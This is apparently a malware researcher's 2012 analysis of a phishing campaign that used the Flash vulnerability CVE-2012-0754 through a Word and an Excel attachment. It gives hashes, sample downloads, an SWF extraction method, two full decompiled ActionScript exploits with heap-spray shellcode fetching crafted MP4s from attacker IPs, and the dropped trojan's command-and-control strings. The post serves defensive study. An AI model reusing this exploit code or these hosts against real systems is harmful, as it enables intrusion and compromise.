Mar 2 CVE-2012-0754 SWF in DOC Iran's Oil and Nuclear Situation.doc

Update: March 9, 2012 - I added another sample donated by anonymous  - it is the same exploit but embedded in an Excel spreadsheet. The details about this sample are highlighted in yellow below.

This is a message from a targeted attack and quite possibly you already received a few on your own - there seem to be a new campaign underway using this new CVE-2012-0754 exploit. The vulnerability exists in Flash and is exploited when it tries to parse a crafted MP4 file. Successful exploitation allows an attacker to execute an arbitrary code.
In this case, the attachment comes as a Word document "Iran's Oil and Nuclear Situation.doc" (and it can come as any document), which contains flash instructing it to download and parse a malformed MP4. The dropped binary is a rather common trojan characterized by its traffic. When it comes to AV names, I don't know whether Graftor or Yayih.A are meaningful or some generic names but maybe you have your own name for it.  

(CVE)number

CVE-2012-0754 

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. 

File information

File: Iran's Oil and Nuclear Situation.doc
Size: 106604
MD5:  E92A4FC283EB2802AD6D0E24C7FCC857

%Temp%\us.exe

File: us.exe
Size: 4861440
MD5:  FD1BE09E499E8E380424B3835FC973A8
https://www.virustotal.com/file/68360603794c0f6d1aff9f6853dbdbb1860a89269d3147dab768034d4195ca62/analysis/1330800179/

Update: March 9, 2012

File: CVE-2012-0744-xls.xls
Size: 241236
MD5:  198DE4A1EBF05F7F44FAF76F167B0233

Payload
File: renos.exe
Size: 61440
MD5:  AD7F04E73E19DEBF7C38034E3DAAF535

Flash
File: CVE-2012-0744-xls.swf
Size: 2436
MD5:  143E2FD4D39199ABF7B871A2BB96FF1F

Mp4
not available but it was 

http://61.196.209.58/syoukai.mp4

Download

You can download all the files listed below from here (email me if you need the password - email address is in my profile)

With many thanks to anonymous CVE-2012-0754 │   capturebatlog.txt │   pcap.pcap │   regshotlog.txt │   swfLogfile.PML │ ├───binary dropped │       us-embedded.exe │       us.exe │ ├───flash │   │   CVE-2012-0754.swf │   │   File3~.swf.dump.txt - swf info │   │ │   └───Scripts │       └───ActionScript 3.0 │               XmlSwf.as │ ├───mp4 │       test.mp4 │ └───original         Iran's Oil and Nuclear Situation.doc Download Sample 2 CVE-2012-0744-xls.xls and the files listed below ├───Original │       CVE-2012-0744-xls.xls │ └───Payload     │   CVE-2012-0744-xls.swf     │   renos.exe     │     └───CVE-2012-0744-xls Scripts         └───ActionScript 3.0                 XmlSwf.as

Message details

I do not have a full message, but here is the sender

From: william abnett <wmorrison89@gmail.com>
Date: March 2, 2012 7:42:24 EST
To: william.abnett <william.abnett@gmail.com>
Subject: Iran's Oil and Nuclear Situation

Exploit and Original File description

Created file

The word document contains flash, which downloads a corrupted mp4 file. The mp4 file itself is not anything special but an 0C filled (22kb) mp4 file with a valid mp4 header. See below comparison of a valid file and the crafted one. This mp4 file causes memory corruption and code execution. Read more about how that works here Microsoft Research Technical Report MSR-TR-2008-176 Nozzle: A Defense Against Heap-spraying Code Injection Attacks

In result, it allows it drop and execute the embedded binary - it is created in the user %Temp% directory as us.exe - see more about it below.

Original files screenshots

image donated by anonymous

I wasn't able to see the cute bear flash file in MS Word but  can see it well when opened it using Google Docs.

Flash file and MP4 file analysis

Existing methods of extracting SWF files from malicious PDF and Office documents

PDF tools:
There are many ways to carve SWF files out of pdf files because it is a common carrier for them - for example, see the well known PDF stream dumper described here by  Lenny Zeltser, pySwfCarve.py by Giuseppe Bonfa, or SWF Mastah by Brandon Dixon

Office Tools:
There is this method of extracting SWF files from office documents - I haven't tried it but looks sort of easy: How To Extract SWF Flash From Excel or Word - code by Emily and explained by Walker. Maybe there are others too.

Update March 11, 2012 - Yuki posted his python script for extracting flash from Office docs (Google translate from Chinese)


CWS - compressed Flash files.
Most of flash embedded in documents is compressed and can be seen in the hex view of the files as starting with CWS. CWS compressed files use the same comression method as any ZiP files -so called Lempel-Ziv-Welch (or LZW) compression. Which means that all you need to get the compressed flash files out the documents and decompress them is an [un]archiver like 7zip or similar. I haven't seen it described online so I shall name it 'the lazy mila' method, but I don't know,  maybe it is a wheel invented by many before me. You can carve swf or other embedded files manually and it is easy to find the start of the file but requires a steady hand and good eye to find the end. It sometimes takes several attempts too and can be tricky. The lazy method seems easier.


CWS Extraction  from any Office Documents and PDFs (The lazy way):
You need:
7zip   http://www.7-zip.org/
Winhex or Flexhex (or other hex editor. File Insight is nice but won't work )

Steps:
1.  Open the document in a hex editor and highlight all data starting from and including CWS to the end of the file and paste it into a new file. Save it as any file name without an extension.
2. Right click on the file and select 7Zip - Extract files.

You are done. 7zip will peel off all the extra unrelated data and create a folder with your swf file inside - it will even create the correct extension. It seems to work only on Windows - it does not work on Linux well and I did not test on Mac but I am sure you have a Windows VM or two.

You can now use any Flash decompiler such as Trillix, Sothink decompiler, or AS3 Socerer to decompile it and get the action script you are after.

Update March 11, 2012  - you can also use the SWF Investigator by Adobe to decompile it - Reviewed here by Brandon Dixon http://blog.9bplus.com/adobes-swf-tools-cve-2012-0754 and here by Yuki

 
FWS - uncompressed flash files.
Occasionally, malicious documents include FWS - decompressed files.  Flash decompilers will happily parse any file with FWS header even if it has an enormous padding or extra data in the end. So, if you want an easy way to extract those files, you cannot use 7zip but you can select all data starting with and including FWS and copy into a new file - give it swf extension when you save.
You can now decompile it even if it is not exactly the correct embedded flash file. You can save the action script and if you have a full paid (not just trial) version of those decompilers, you can probably even re-save it as the small real flash file.

Flash file

File: CVE-2012-0754.swf
Size: 2431
MD5:  128A66CC3EFE6F424C3FEDCC4B6235AC

See below decompiled flash from our file  - it instructs to download the mp4 file this.MyNS.play("http://208.115.230.76/test.mp4");

208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street
Suite 200
Dallas
TX
75202
United States

Action Script

//XmlSwf package { import flash.display.*; import flash.media.*; import flash.net.*; import flash.utils.*; public class XmlSwf extends flash.display.MovieClip { public function XmlSwf() { super(); var loc1:*=new flash.utils.ByteArray(); var loc2:*=new flash.utils.ByteArray(); loc2.endian = flash.utils.Endian.LITTLE_ENDIAN; var loc4:*=0; loc4 = 0; if (loc4 < 5140) { loc1.writeInt(336860180); loc4 = loc4 + 4; } loc1.writeInt(336860180); loc2.writeInt(2590463591); loc2.writeInt(213916234); loc2.writeInt(3076656754); loc2.writeInt(1088421207); loc2.writeInt(700118367); loc2.writeInt(1252572847); loc2.writeInt(1645147301); loc2.writeInt(1644886796); loc2.writeInt(232616460); loc2.writeInt(2012288588); loc2.writeInt(1645113980); loc2.writeInt(4117897355); loc2.writeInt(3639680550); loc2.writeInt(47482116); loc2.writeInt(1013342347); loc2.writeInt(330901268); loc2.writeInt(4116850571); loc2.writeInt(2099669024); loc2.writeInt(821149857); loc2.writeInt(230362476); loc2.writeInt(2681195333); loc2.writeInt(2776217459); loc2.writeInt(169801743); loc2.writeInt(2742429346); loc2.writeInt(2752057163); loc2.writeInt(96445900); loc2.writeInt(681912095); loc2.writeInt(2104154251); loc2.writeInt(2129727577); loc2.writeInt(1859945931); loc2.writeInt(1727094643); loc2.writeInt(2504723851); loc2.writeInt(232959189); loc2.writeInt(1716096347); loc2.writeInt(1238987306); loc2.writeInt(1633795783); loc2.writeInt(704101665); loc2.writeInt(752393144); loc2.writeInt(1225400767); loc2.writeInt(297647655); loc2.writeInt(571513780); loc2.writeInt(1646162468); loc2.writeInt(2050341132); loc2.writeInt(3067460034); loc2.writeInt(3567661445); loc2.writeInt(3066400524); loc2.writeInt(2050341340); loc2.writeInt(1235624383); loc2.writeInt(297647655); loc2.writeInt(2127398332); loc2.writeInt(2728800651); loc2.writeInt(1921958660); loc2.writeInt(2980590126); loc2.writeInt(1520878015); loc2.writeInt(1237170637); loc2.writeInt(1386223366); loc2.writeInt(3555542208); loc2.writeInt(809503464); loc2.writeInt(2837681641); loc2.writeInt(1645204008); loc2.writeInt(1645107212); loc2.writeInt(1645104168); loc2.writeInt(1645087960); loc2.writeInt(4092851187); loc2.writeInt(62451); Encrypt2(loc2); loc1.writeBytes(loc2); loc4 = loc1.length; if (loc4 < 65536) { loc1.writeInt(336860180); loc4 = loc4 + 4; } allocs = new Array(); var loc5:*=new Array(); pool = new flash.utils.ByteArray(); pool.writeBytes(loc1); while (pool.length < 1048576) { var loc6:*=new flash.utils.ByteArray(); loc6.writeBytes(pool); pool.writeBytes(loc6); } var loc7:*=new flash.utils.ByteArray(); loc7.writeBytes(pool, 0, 1048576 - 3840 - 36); allocs.push(loc7); pool = null; loc4 = 0; if (loc4 < 416) { var loc8:*=new flash.utils.ByteArray(); loc8.writeBytes(loc7, 0, 1048576 - 3840 - 36); allocs.push(loc8); ++loc4; } this.MyVideo = new flash.media.Video(); this.addChild(this.MyVideo); this.MyNC = new flash.net.NetConnection(); this.MyNC.connect(null); this.MyNS = new flash.net.NetStream(this.MyNC); this.MyVideo.attachNetStream(this.MyNS); this.MyNS.play("http://208.115.230.76/test.mp4"); return; } public static function Encrypt(arg1:flash.utils.ByteArray):* { var loc1:*=arg1.length; var loc2:*=0; if (loc2 < loc1) { var loc3:*=loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 168; arg1[loc2] = loc3; arg1[loc2] = arg1[loc2] - 19; loc3 = loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 126; arg1[loc2] = loc3; ++loc2; } return; } public static function Encrypt2(arg1:flash.utils.ByteArray):* { var loc1:*=arg1.length; var loc2:*=0; if (loc2 < loc1) { var loc3:*=loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 77; arg1[loc2] = loc3; arg1[loc2] = arg1[loc2] - 26; loc3 = loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 201; arg1[loc2] = loc3; ++loc2; } return; } public static function hexToBin(arg1:String):flash.utils.ByteArray { var loc1:*=new flash.utils.ByteArray(); var loc2:*=arg1.length; var loc3:*=0; if (loc3 < loc2) { var loc4:*=arg1.charAt(loc3) + arg1.charAt(loc3 + 1); loc1.writeByte(parseInt(loc4, 16)); loc3 = loc3 + 2; } return loc1; return; } internal var jit_egg:flash.utils.ByteArray; internal var childRef:flash.display.DisplayObject=null; public var MyVideo:flash.media.Video; public var MyNC:flash.net.NetConnection; public var MyNS:flash.net.NetStream; internal static var allocs:Array; internal static var pool:flash.utils.ByteArray; internal static var allocCount:int; } } import flash.display.*; import flash.events.*; { XmlSwf = #error('newclass') XmlSwf, flash.display.MovieClip ; }

Address  Hex length Dec length Data
00000000      97f.0     2431.0 SWF
00000000       14.0       20.0  Header
00000000        3.0        3.0   File label = "FWS"
00000003        1.0        1.0   File version = 9
00000004        4.0        4.0   File length = 2431
00000008        8.0        8.0   Frame rect
00000010        2.0        2.0   Frame rate = 25.000000
00000012        2.0        2.0   Frame count = 1
00000014      96b.0     2411.0  Tags
00000014        6.0        6.0   FileAttribute = 69
0000001a      954.0     2388.0   DoABCDefine = 82
0000096e        d.0       13.0   SymbolClass = 76
0000097b        2.0        2.0   ShowFrame = 1
0000097d        2.0        2.0   End = 0

Update: March 9, 2012- ActionScript for Excel embedded SWF
//XmlSwf package { import flash.display.*; import flash.media.*; import flash.net.*; import flash.utils.*; public class XmlSwf extends flash.display.MovieClip { public function XmlSwf() { super(); var loc1:*=new flash.utils.ByteArray(); var loc2:*=new flash.utils.ByteArray(); loc2.endian = flash.utils.Endian.LITTLE_ENDIAN; var loc4:*=0; loc4 = 0; if (loc4 < 5140) { loc1.writeInt(336860180); loc4 = loc4 + 4; } loc1.writeInt(336860180); loc2.writeInt(2590463591); loc2.writeInt(213916234); loc2.writeInt(3078360690); loc2.writeInt(1088421207); loc2.writeInt(700118367); loc2.writeInt(1151909551); loc2.writeInt(2081354917); loc2.writeInt(2081094412); loc2.writeInt(1943892492); loc2.writeInt(1911625292); loc2.writeInt(2081321596); loc2.writeInt(4218560651); loc2.writeInt(3740343846); loc2.writeInt(483689732); loc2.writeInt(577134731); loc2.writeInt(767108884); loc2.writeInt(4217513867); loc2.writeInt(1663461408); loc2.writeInt(921813153); loc2.writeInt(1941638508); loc2.writeInt(2580532037); loc2.writeInt(2876880755); loc2.writeInt(69138447); loc2.writeInt(3178636962); loc2.writeInt(2852720459); loc2.writeInt(197109196); loc2.writeInt(782575391); loc2.writeInt(1667946635); loc2.writeInt(2029064281); loc2.writeInt(1759282635); loc2.writeInt(1626431347); loc2.writeInt(2605387147); loc2.writeInt(1944235221); loc2.writeInt(1615433051); loc2.writeInt(1339650602); loc2.writeInt(1734459079); loc2.writeInt(804764961); loc2.writeInt(316185528); loc2.writeInt(1326064063); loc2.writeInt(398310951); loc2.writeInt(1007721396); loc2.writeInt(2082370084); loc2.writeInt(1949677836); loc2.writeInt(2966796738); loc2.writeInt(3668324741); loc2.writeInt(2965737228); loc2.writeInt(1949678044); loc2.writeInt(1336287679); loc2.writeInt(398310951); loc2.writeInt(2026735036); loc2.writeInt(3165008267); loc2.writeInt(210661892); loc2.writeInt(3081253400); loc2.writeInt(1420214719); loc2.writeInt(1337833933); loc2.writeInt(1822430982); loc2.writeInt(3991749824); loc2.writeInt(910166760); loc2.writeInt(2938344937); loc2.writeInt(2081024192); loc2.writeInt(2081387020); loc2.writeInt(2080958656); loc2.writeInt(2081295408); loc2.writeInt(4092851187); loc2.writeInt(62451); Encrypt2(loc2); loc1.writeBytes(loc2); loc4 = loc1.length; if (loc4 < 65536) { loc1.writeInt(336860180); loc4 = loc4 + 4; } allocs = new Array(); var loc5:*=new Array(); pool = new flash.utils.ByteArray(); pool.writeBytes(loc1); while (pool.length < 1048576) { var loc6:*=new flash.utils.ByteArray(); loc6.writeBytes(pool); pool.writeBytes(loc6); } var loc7:*=new flash.utils.ByteArray(); loc7.writeBytes(pool, 0, 1048576 - 3840 - 36); allocs.push(loc7); pool = null; loc4 = 0; if (loc4 < 416) { var loc8:*=new flash.utils.ByteArray(); loc8.writeBytes(loc7, 0, 1048576 - 3840 - 36); allocs.push(loc8); ++loc4; } this.MyVideo = new flash.media.Video(); this.addChild(this.MyVideo); this.MyNC = new flash.net.NetConnection(); this.MyNC.connect(null); this.MyNS = new flash.net.NetStream(this.MyNC); this.MyVideo.attachNetStream(this.MyNS); this.MyNS.play("http://61.196.209.58/syoukai.mp4"); return; } public static function Encrypt(arg1:flash.utils.ByteArray):* { var loc1:*=arg1.length; var loc2:*=0; if (loc2 < loc1) { var loc3:*=loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 168; arg1[loc2] = loc3; arg1[loc2] = arg1[loc2] - 19; loc3 = loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 126; arg1[loc2] = loc3; ++loc2; } return; } public static function Encrypt2(arg1:flash.utils.ByteArray):* { var loc1:*=arg1.length; var loc2:*=0; if (loc2 < loc1) { var loc3:*=loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 77; arg1[loc2] = loc3; arg1[loc2] = arg1[loc2] - 26; loc3 = loc2; arg1[loc3] = loc3 = arg1[loc3] ^ 201; arg1[loc2] = loc3; ++loc2; } return; } public static function hexToBin(arg1:String):flash.utils.ByteArray { var loc1:*=new flash.utils.ByteArray(); var loc2:*=arg1.length; var loc3:*=0; if (loc3 < loc2) { var loc4:*=arg1.charAt(loc3) + arg1.charAt(loc3 + 1); loc1.writeByte(parseInt(loc4, 16)); loc3 = loc3 + 2; } return loc1; return; } internal var jit_egg:flash.utils.ByteArray; internal var childRef:flash.display.DisplayObject=null; public var MyVideo:flash.media.Video; public var MyNC:flash.net.NetConnection; public var MyNS:flash.net.NetStream; internal static var allocs:Array; internal static var pool:flash.utils.ByteArray; internal static var allocCount:int; } } import flash.display.*; import flash.events.*; { XmlSwf = #error('newclass') XmlSwf, flash.display.MovieClip ; }

MP4 file

GET /test.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 03 Mar 2012 18:01:01 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.8
Last-Modified: Thu, 23 Feb 2012 01:27:38 GMT
ETag: "120000000071c4-5770-4b9978caa1680"
Accept-Ranges: bytes
Content-Length: 22384
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: video/mp4

....ftypmp42....mp42isom...
cprt..................................

As was mentioned above, there is nothing unique in the MP4 file and you are likely to see the same or nearly identical mp4 in all of attacks using this exploit.

File: test.mp4
Size: 22384
MD5:  8933598C8B1FA5E493497B11C48DA4F2

See below on the picture the normal mp4 file that I recorded compared to the crafted file in hex editor.  If you need, you can download the normal file here (normal.mp4 16KB)

Payload and traffic

Resource section view:
Java updater information and
and the language ID of the resource
- Chinese Language

File: us-embedded.exe
Size: 23040
MD5:  CB3DCDE34FD9FF0E19381D99B02F9692

File: us.exe
Size: 4861440
MD5:  FD1BE09E499E8E380424B3835FC973A8

The file (us.exe MD5: FD1BE09E499E8E380424B3835FC973A8 4861440 bytes) is created in the logged in user %Temp% directory. The size of the embedded file is 22.5 KB (23040 bytes) and the size of the created us.exe is 4.63MB. It is an odd discrepancy until you look at the file and it looks like the code is repeated over and over - 211 times. The file resource section indicates the file is meant to look like a java updater, which is always larger than 22.5KB and that would explain all this padding, which is done at the time when the file is being written to the disk.

The file strings are below - you can see the command and control servers and the POST request url. If you are tracking APT, you are likely to recognize this trojan.
Strings

00405010: 'documents.myPicture.info',0 00405030: 'ftp.documents.myPicture.info',0 00405050: 'www.documents.myPicture.info',0 00405070: 'us0302',0 00405110: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0 00405154: '3frYx8vWx9vvAcnU3dvd2tjHBQHO1N3J2dbpAdrYx9vYz8f32dvd1ADP1/vP',0 00405194: 'x/r82d3bx8rZ2tr93dTT2+PZ3evZztk=',0 004051B8: 'x/r42drVy8j8ydPb2s7Y1OQ=',0 004051D4: 'x/r82dPb2s7Y1Onky9HZ2g==',0 004051F0: 'y/bY1N3n+dvO1NDG/cjSy8nI2Q==',0 00405210: 'x+b52dnkx9no0NrUycjd2ePb7A==',0 00405230: 'x+b52cvZ2Nvc2M703cfs',0 00405248: 'x/nP287U2Mz8yN3bx8rZ2g==',0 00405264: '2urLyMfZ2v3JztnI69o=',0 0040527C: '2vbY1ObI0NTI',0 0040528C: 'x+nH0cfZ0+fH0ew=',0 004052A0: '2urLyMfZ0+fH0ew=',0 004052B4: 'x+bw2dnM59na29rO',0 004052C8: '2urLyMfZ1/DH2evl',0 004052DC: '0+fIz9Dq2c7I',0 004052EC: '0+fIz8fv2OXT58fR7A==',0 00405304: '0+fIz9Pn2dvm2dDU68g=',0 0040531C: 'zvTH2c7b2MjH+v3Z2N3d1OvP',0 00405338: 'zvTH2c7b2MjQ6tnO9MjOzNDJyA==',0 00405358: 'zvTH2c7b2Mja9tjU5sjQ1Mg=',0 00405374: 'zvTH2c7b2MjH+8jM0+fH0Q==',0 00405390: '2PXc2cf6yM/H+9fc2cjn2evl',0 004053AC: '2PXc2cf6yM/H+9fc2cjr2Q==',0 004053C8: '2PXc2dzuzsjH+9fc2cjr2Q==',0 004053E4: 'zvTH2c7b2Mjd6s7Pycjr2Q==',0 00405400: 'zvTH2c7b2Mjc7s7I7A==',0 00405418: 'x/voxtDI2Mj2yNDMx9js',0 00405430: '0PrHyN0=',0 0040543C: 'x/vpxt3Rx9rH8uQ=',0 00405450: 'x/v5xtjIy/fX0efI6+U=',0 00405468: 'x/vpxsfb2MzxyOPI5Ojs',0 00405480: 'common',0 00405488: 'eabvjp33e.ml',0 00405498: 'pSufbwfrN\diprpsufX\oipdtwD\sufrunfVtrpi]nvRn',0 004054C8: 'aspe',0 004054D0: 'fkorme33e.ml',0 004054E0: 'gram Files\*',0 004054F0: 'c:\Pro',0 004054F8: '\cmd.exe',0 00405504: 'exit',0Dh,0Ah,0 0040550C: 'exit',0Ah,0 00405514: 'POST',0 0040551C: '/bbs/info.asp',0 0040552C: 'HTTP/1.1',0 00405538: '\aumLib.ini',0 00405548: 'Appmt.exe',0 00405554: '0.0.0.0',0 0040555C: 'jwjnfn/tmdl',0 0040556C: 'Identifier',0 00405578: 'C:\Program Files\Common Files\console.exe',0 004055A4: 'CommonProgramFiles',0 004055B8: 'abcdef',0 004055C0: ':Zone.',0 004055CC: '%s v%d.%d build %d',0 004055E0: 'Win3.1',0 004055E8: 'Win95',0 004055F0: 'WinNT',0 004055F8: 'Win?',0 0040560C: '%08x',0 00405618: 'Open',0 00405620: ' > nul',0 00405628: '/c del ',0 00405630: 'COMSPEC',0

 
Name listing 00401000: SUB_L00401000 004010D3: L004010D3 004010E4: L004010E4 004010ED: L004010ED 004010F2: SUB_L004010F2 004011B3: L004011B3 004011C4: L004011C4 004011CD: L004011CD 004011D2: SUB_L004011D2 0040127B: L0040127B 0040129C: L0040129C 004012B0: L004012B0 004012B5: L004012B5 004012C3: L004012C3 004012C5: L004012C5 004012C9: SUB_L004012C9 004012D8: L004012D8 004012DF: L004012DF 00401307: SUB_L00401307 0040150C: L0040150C 00401529: L00401529 0040153F: L0040153F 00401576: L00401576 004015C9: L004015C9 004015E8: L004015E8 0040169E: L0040169E 004016AD: L004016AD 004016AF: L004016AF 004016EC: L004016EC 00401719: L00401719 0040171C: L0040171C 00401743: L00401743 0040175A: L0040175A 004017E2: L004017E2 0040180C: L0040180C 0040197C: L0040197C 004019AB: L004019AB 004019D0: L004019D0 004019E7: L004019E7 00401A29: L00401A29 00401A38: L00401A38 00401A60: L00401A60 00401A65: L00401A65 00401A8C: L00401A8C 00401AC2: L00401AC2 00401AD9: L00401AD9 00401B0D: L00401B0D 00401B19: L00401B19 00401B90: L00401B90 00401C36: L00401C36 00401C4D: L00401C4D 00401C9F: L00401C9F 00401CD6: L00401CD6 00401D1E: L00401D1E 00401D49: L00401D49 00401D79: L00401D79 00401DB5: L00401DB5 00401DBC: L00401DBC 00401DC5: L00401DC5 00401E3B: L00401E3B 00401E5F: L00401E5F 00401E79: L00401E79 00401F04: L00401F04 00401F31: L00401F31 00401F60: L00401F60 004020DA: L004020DA 00402178: L00402178 004021A6: L004021A6 00402290: L00402290 00402317: L00402317 0040237C: L0040237C 004023F8: L004023F8 00402408: L00402408 00402435: L00402435 00402437: L00402437 00402444: L00402444 0040247D: L0040247D 0040250C: L0040250C 00402537: L00402537 00402540: L00402540 00402555: L00402555 004025C9: L004025C9 004025D3: L004025D3 0040260B: L0040260B 0040263B: L0040263B 00402651: L00402651 00402654: L00402654 0040265C: L0040265C 00402669: L00402669 0040266D: L0040266D 00402671: L00402671 004026A1: L004026A1 004026AD: L004026AD 004026B4: SUB_L004026B4 004026C1: L004026C1 004026D8: L004026D8 004026DA: L004026DA 004026EA: L004026EA 004026EC: L004026EC 004026F8: L004026F8 004026FA: SUB_L004026FA 0040270D: L0040270D 0040272E: L0040272E 00402731: L00402731 00402735: L00402735 00402763: SUB_L00402763 0040280E: L0040280E 00402853: L00402853 0040286D: L0040286D 004028D2: L004028D2 004028DF: L004028DF 0040291A: L0040291A 00402947: L00402947 0040297A: L0040297A 00402991: L00402991 00402998: L00402998 0040299F: L0040299F 004029A4: L004029A4 00402A29: L00402A29 00402A45: SUB_L00402A45 00402BBE: L00402BBE 00402BC2: L00402BC2 00402BC5: L00402BC5 00402BC9: SUB_L00402BC9 00402BFB: L00402BFB 00402C11: L00402C11 00402C26: L00402C26 00402C39: SUB_L00402C39 00402C63: L00402C63 00402C7D: L00402C7D 00402C95: L00402C95 00402C9F: SUB_L00402C9F 00402CC3: L00402CC3 00402CD4: L00402CD4 00402CEC: L00402CEC 00402D0E: L00402D0E 00402D26: L00402D26 00402D31: SUB_L00402D31 00402D42: L00402D42 00402D43: SUB_L00402D43 00402ECF: L00402ECF 00402EE4: L00402EE4 00402EEF: L00402EEF 00402EF4: SUB_L00402EF4 00402F24: L00402F24 00402F6B: L00402F6B 00402F7C: L00402F7C 00402F8D: L00402F8D 00402FA0: L00402FA0 00402FB3: L00402FB3 00402FC6: L00402FC6 00402FD4: L00402FD4 00402FE1: L00402FE1 00402FFA: L00402FFA 00402FFF: L00402FFF 00403004: SUB_L00403004 00403011: L00403011 00403021: L00403021 00403024: L00403024 00403028: SUB_L00403028 0040304A: L0040304A 00403061: L00403061 00403066: jmp_MSVCRT.dll!strlen 0040306C: jmp_MSVCRT.dll!strcat 00403072: jmp_MSVCRT.dll!strcpy 00403078: jmp_MSVCRT.dll!memcpy 0040307E: jmp_MSVCRT.dll!strcmp 00403084: jmp_MSVCRT.dll!memset 00403090: SUB_L00403090 0040309C: L0040309C 004030B0: L004030B0 004030BF: EntryPoint 00403142: L00403142 004031D0: jmp_MSVCRT.dll!_XcptFilter 004031D6: jmp_MSVCRT.dll!_initterm 004031DC: SUB_L004031DC 004031EE: L004031EE 004031F1: SUB_L004031F1 00403200: jmp_MSVCRT.dll!_except_handler3 00403206: jmp_MSVCRT.dll!_controlfp 00404000: KERNEL32.dll!FreeLibrary 00404004: KERNEL32.dll!Sleep 00404008: KERNEL32.dll!GetProcAddress 0040400C: KERNEL32.dll!CreatePipe 00404010: KERNEL32.dll!ReadFile 00404014: KERNEL32.dll!SetFilePointer 00404018: KERNEL32.dll!GetFileSize 0040401C: KERNEL32.dll!CloseHandle 00404020: KERNEL32.dll!GetTempPathA 00404024: KERNEL32.dll!CopyFileA 00404028: KERNEL32.dll!GetShortPathNameA 0040402C: KERNEL32.dll!GetEnvironmentVariableA 00404030: KERNEL32.dll!GetLastError 00404034: KERNEL32.dll!GetModuleFileNameA 00404038: KERNEL32.dll!lstrlenA 0040403C: KERNEL32.dll!GetVersionExA 00404040: KERNEL32.dll!GetVolumeInformationA 00404044: KERNEL32.dll!GetComputerNameA 00404048: KERNEL32.dll!LoadLibraryA 0040404C: KERNEL32.dll!GetCurrentThread 00404050: KERNEL32.dll!GetCurrentProcess 00404054: KERNEL32.dll!lstrcatA 00404058: KERNEL32.dll!lstrcpyA 00404060: MSVCRT.dll!_controlfp 00404064: MSVCRT.dll!_except_handler3 00404068: MSVCRT.dll!__set_app_type 0040406C: MSVCRT.dll!__p__fmode 00404070: MSVCRT.dll!__p__commode 00404074: MSVCRT.dll!_adjust_fdiv 00404078: MSVCRT.dll!__setusermatherr 0040407C: MSVCRT.dll!_initterm 00404080: MSVCRT.dll!__getmainargs 00404084: MSVCRT.dll!__p___initenv 00404088: MSVCRT.dll!strlen 0040408C: MSVCRT.dll!strstr 00404090: MSVCRT.dll!strcat 00404094: MSVCRT.dll!strcpy 00404098: MSVCRT.dll!memcpy 0040409C: MSVCRT.dll!fclose 004040A0: MSVCRT.dll!fwrite 004040A4: MSVCRT.dll!fopen 004040A8: MSVCRT.dll!strcmp 004040AC: MSVCRT.dll!memset 004040B0: MSVCRT.dll!strrchr 004040B4: MSVCRT.dll!fread 004040B8: MSVCRT.dll!sprintf 004040BC: MSVCRT.dll!realloc 004040C0: MSVCRT.dll!malloc 004040C4: MSVCRT.dll!_exit 004040C8: MSVCRT.dll!_XcptFilter 004040CC: MSVCRT.dll!exit 004040D4: SHELL32.dll!ShellExecuteExA 004040D8: SHELL32.dll!SHGetSpecialFolderPathA 004040DC: SHELL32.dll!SHChangeNotify 004040E4: SHLWAPI.dll!PathFileExistsA 004040EC: USER32.dll!wsprintfA 004040F4: WS2_32.dll!WS2_32.116 004040F8: WS2_32.dll!WS2_32.115 004040FC: WS2_32.dll!WS2_32.52 00404100: WS2_32.dll!WS2_32.12 00404108: L00404108 00405000: L00405000 00405004: L00405004 00405008: L00405008 0040500C: L0040500C 00405010: SSZ00405010_documents_myPicture_info 00405030: SSZ00405030_ftp_documents_myPicture_info 00405050: SSZ00405050_www_documents_myPicture_info 00405070: SSZ00405070_us0302 00405090: L00405090 00405094: L00405094 00405098: L00405098 0040509C: L0040509C 004050A4: L004050A4 004050A8: L004050A8 004050AC: L004050AC 004050B0: L004050B0 004050B4: L004050B4 004050B8: L004050B8 004050BC: L004050BC 004050C0: L004050C0 004050C4: L004050C4 004050C8: L004050C8 004050CC: L004050CC 004050D0: L004050D0 004050D4: L004050D4 004050D8: L004050D8 004050DC: L004050DC 004050E0: L004050E0 004050E4: L004050E4 004050E8: L004050E8 004050EC: L004050EC 004050F0: L004050F0 004050F4: L004050F4 004050F8: L004050F8 004050FC: L004050FC 00405100: L00405100 00405104: L00405104 00405108: L00405108 0040510C: L0040510C 00405110: SSZ00405110_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef 00405154: SSZ00405154_3frYx8vWx9vvAcnU3dvd2tjHBQHO1N3J 00405194: SSZ00405194_x_r82d3bx8rZ2tr93dTT2_PZ3evZztk_ 004051B8: SSZ004051B8_x_r42drVy8j8ydPb2s7Y1OQ_ 004051D4: SSZ004051D4_x_r82dPb2s7Y1Onky9HZ2g__ 004051F0: SSZ004051F0_y_bY1N3n_dvO1NDG_cjSy8nI2Q__ 00405210: SSZ00405210_x_b52dnkx9no0NrUycjd2ePb7A__ 00405230: SSZ00405230_x_b52cvZ2Nvc2M703cfs 00405248: SSZ00405248_x_nP287U2Mz8yN3bx8rZ2g__ 00405264: SSZ00405264_2urLyMfZ2v3JztnI69o_ 0040527C: SSZ0040527C_2vbY1ObI0NTI 0040528C: SSZ0040528C_x_nH0cfZ0_fH0ew_ 004052A0: SSZ004052A0_2urLyMfZ0_fH0ew_ 004052B4: SSZ004052B4_x_bw2dnM59na29rO 004052C8: SSZ004052C8_2urLyMfZ1_DH2evl 004052DC: 